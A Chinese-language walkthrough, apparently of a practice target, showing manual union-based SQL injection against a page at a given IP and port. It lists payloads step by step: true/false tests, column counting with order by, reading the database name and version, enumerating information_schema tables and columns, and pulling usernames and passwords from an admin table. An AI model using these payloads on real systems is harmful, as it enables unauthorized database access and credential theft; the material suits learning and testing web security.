目标url:http://117.41.229.122:8003/?id=1
构造 ?id=1 and 1=1 ,回车
页面返回正常
构造 ?id=1 and 1=2 ,回车
页面不正常,初步判断这里 可能 存在一个注入漏洞
构造 ?id=1 and 1=1 order by 1 回车
页面正常
构造 ?id=1 and 1=1 order by 2 回车
页面正常
构造 ?id=1 and 1=1 order by 3 回车
构造 ?id=1 and 1=2 union select 1,2 回车
可以显示我们输入sql 语句来获取想要的内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车
查询当前数据库版本
构造 ?id=1 and 1=2 union select 1,version() 回车
构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车
绝大数情况下,管理员的账号密码都在admin表里
查询字段名
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1 回车
查出 admin 表里 有 id username password 三个字段
查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,password from admin limit 1,1 回车
构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回车
得到管理员账号和密码,大功告成。
1224
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
